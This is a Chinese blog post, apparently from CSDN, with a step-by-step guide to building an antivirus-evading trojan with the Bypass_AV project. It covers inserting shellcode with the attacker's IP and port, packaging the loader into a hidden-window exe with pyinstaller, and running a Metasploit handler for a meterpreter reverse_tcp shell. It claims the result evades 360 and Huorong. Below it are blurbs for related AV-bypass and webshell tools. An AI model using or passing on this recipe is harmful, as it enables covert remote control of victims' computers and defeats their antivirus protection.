使用Bypass_AV-main进行免杀木马

琴1111

已于 2023-01-12 23:32:11 修改

阅读量484

点赞数 1

文章标签： python

于 2023-01-12 18:20:56 首次发布

本文链接：https://blog.csdn.net/weixin_60526723/article/details/128663977

版权

项目地址：https://github.com/Axx8/Bypass_AV

生成shellcode，ip与端口替换

将生成的shellcode复制下来放入项目中的py文件

将shellcode复制到这里

保存py文件，使用pyinstaller模块进行打包，打包命令如下：

 pyinstaller.exe -F -w .\Bypass_AV.py -i .\favicon.ico

有需要可以-i，将ico图标封装到exe中

在dist目录下可以找到生成的exe文件

启动msf，开启监听

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run

点击exe成功上线，

输入shell进入，出现乱码情况输入 chcp 65001

也可以将msf的shell反弹到cs上，详情请看第一篇文章

免杀效果如下：可过火绒与360

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

琴1111

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
使用Bypass_AV-main进行免杀木马

使用python进行shellcode免杀
复制链接

扫一扫

go混淆实现bypassAV（cobaltstrike免杀）

qq_32445755的博客

02-09

896

近两年随着hw和红蓝对抗的增多，接触到的提权、内网渗透、域渗透也越来越多。攻击能力有没有提升不知道，但防护水平明显感觉提升了一大截，先不说防护人员的技术水平如果，最起码各种云WAF、防火墙、隔离设备部署的多了，服务器上也经常能见到安装了杀软、软waf、agent等等，特别是某数字杀软在国内服务器上尤为普及。这个时候，不会点免杀技术就非常吃亏了。

闲谈 bypass AV

Coisini的博客

06-23

4912

孩纸，看到AV别乱想~这里说的AV是AntiVirus。即杀软。（这些日子考试繁重，更的少了…) 本篇文章简单说一下本人平时常用的免杀工具以及其使用~ 0x00 Hyperion 第一个说说这个 Hyperion,因为比较轻量级~，为什么说轻量级呢，因为，360杀毒能检测出。。其实 Hyperion 是一款加密工具，通过5轮AES加密来加密的你payload，加密完成后的payload是可以...

参与评论您还未登录，请先登录后发表或查看评论

BypassAV：对抗性样本生成工具，安全研究者的得力助手

最新发布

gitblog_00094的博客

04-04

377

BypassAV：对抗性样本生成工具，安全研究者的得力助手项目地址:https://gitcode.com/G73st/BypassAV BypassAV 是一个开源项目，致力于帮助安全研究人员和开发者创建对抗性样本，以测试和提升反病毒软件的检测能力。该项目采用Python编写，具有简单易用、功能强大的特点，对于理解恶意软件逃避策略和提高网络安全防御水平具有重要价值。项目简介 BypassAV...

Bypass AV meterpreter免杀技巧

weixin_30517001的博客

03-19

1757

0x01 meterpreter简介 MetasploitFramework是一个缓冲区溢出测试使用的辅助工具，也可以说是一个漏洞利用和测试平台，它集成了各种平台上常见的溢出漏洞和流行的shellcode，并且不断更新，使得缓冲区溢出测试变的方便和简单。需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll，所以在网络不稳定的情况下经常出现没...

APCInjector-BYPASS-AV

05-20

APCInjector-BYPASS-OFF

BT5 实战之AV bypass and Bypass AV

weixin_34227447的博客

03-03

184

Backtrack 5 实战之 AV bypass and Bypass AV 免杀创作(AV bypass) --- ARP 欺骗(MITM) --- 干掉杀软(Bypass AV) ...

hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip

05-20

configurationFile配置文件解密

new.bypass_bypass_NEW_免杀_webshell_phpwebshell_

10-03

免杀webshell

bypass-av-note:免杀技术大杂烩---乱拳也打不死老师傅

03-31

免杀技术大杂烩---乱拳也打不死老师傅作者：Boi @ Linton Lab 360 [目录]左上角按钮可以看目录树目前的反病毒安全软件，常见有三种，一种基于特征，一种基于行为，一种基于云查杀。对特征突出，大多数杀毒软件会定义...

bypass-paywalls-chrome-master_bypass_sitetemplate_

09-29

Bypass website paywalls

「数据治理」Liar_Game：The_Secret_of_Mitigation_Bypass_Techniques -

12-04

「数据治理」Liar_Game：The_Secret_of_Mitigation_Bypass_Techniques - 区块链 Android 安全资讯防火墙 Web安全数据分析

DotNetAVBypass-Master:C＃AV绕过垃圾

05-23

/ * “啤酒许可证”（修订版34）–否Dennis Kuntz开源许可证：没有写入此文件。只要您通过电子邮件将有趣的故事发送给我们，可以用这个东西做任何你想做的事。除非您是Dennis Kuntz。在任何情况下都不得授予Dennis Kuntz使用该软件的权利，源代码，文档或其他相关材料。从事本软件交易的人员同意不故意分发这些材料或Dennis Kuntz的任何衍生作品。 * / 点网AV绕过编写此应用程序的目的是为了能够在防病毒系统可能承担您的工具/有效负载的环境中使用渗透测试工具。随附的概念验证，可在隐藏窗口中的远程主机上运行Metasploit Meterpreter有效负载（可以从命令行调用）。此解决方案是使用Visual Studio 2010制作的，但至少应在2005年以下的任何版本上编译。没有特殊的“不安全”标志或任何必需的标志。原

Golang-Gin 框架写的免杀平台，内置分离、捆绑等多种BypassAV方式

qq_53058639的博客

02-27

401

Golang-Gin 框架写的免杀平台，内置分离、捆绑等多种BypassAV方式。

cobaltstrike4.3插件——BypassAV免杀使用

wdsj_xh的博客

05-12

5726

0x01* 环境介绍本次免杀所使用的是shellcode分离免杀技术 cobaltstrike4.3客户端：Windows10 专业版 cobaltstrike4.3客户端：自己VPS CS版本：4.3 语言环境：Golang，插件需要本地安装Golang环境，生成木马时会调用编译 cobaltstrike4.3下载和使用见前面文章，CSDN应该发不了破解类东西啦，贴下自己网站链接 http://www.digter8.com/391.html CS 4.3下载 http://www.digter8.co

文件上传的一个骚操作(低权限+bypassAV)

mingyqf的博客

05-20

328

原文链接： https://www.freebuf.com/articles/network/259671.html 文件上传的一个骚操作(低权限+bypassAV) 耳旁的歌 2021-01-03 22:03:33 177169 2 各位在渗透中是否遇见过这个问题：虽然有低权限命令shell，如mssql、postgres等，执行下载总是各种无权限或者被AV杀，轻则无法继续渗透，重则弹出拦截消息，管理员上机后立马发现。本文将介绍一种使用windows

免杀工具BypassAv-web使用教程

kracer的博客

02-28

5222

0x01 介绍 nim 一键木马免杀项目，目前能完美过360、火绒等杀软。作者使用纯nim语言编写的shellcode记载器，代码基本是从之前c++版本平移过来，作者并没有提供部署教程，踩坑记录下。 0x02 使用教程环境：ubuntu 20.4 安装： # 下载代码库 cd /root git clone https://github.com/M-Kings/BypassAv-web.git # 起个Ubuntu的docker 安装do...

Powershell tricks::Bypass AV

weixin_34259232的博客

03-08

265

DM_ · 2014/10/27 10:320x00 Powershell 简介Powershell犹如linux下的bash，并且在windows中Powershell可以利用.NET Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。 Powershell强大的功能特性给windows管理带来了极大的...

Malware Dev 05 - 免杀之 Shellcode Execution Through Fiber

0pr

03-13

631

这篇文章尝试用各种方式，使用 C# 和 C++ 绕过 Avira 的检测，执行 shellcode。两种语言在绕过 Avira 的检测时，各有优劣。主要技巧还是通过运行时解析方法地址，再调用的方式，以及配合代码混淆，来躲避 Avira 的检测。下一篇文章，我们将对卡巴斯基发起挑战。同时，我们可能会会引入 Rust（视情况而定），看一下 Rust 在免杀实战中的表现。

as_bypass_php_disable_functions-master

09-17

然后，根据自己的需求，参考项目文档中的说明进行配置。在项目运行后，我们就可以使用被禁用的函数了。但是需要注意的是，使用这个项目绕过禁用函数可能会带来一些风险和安全隐患。因此，我们应该谨慎使用，并确保...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交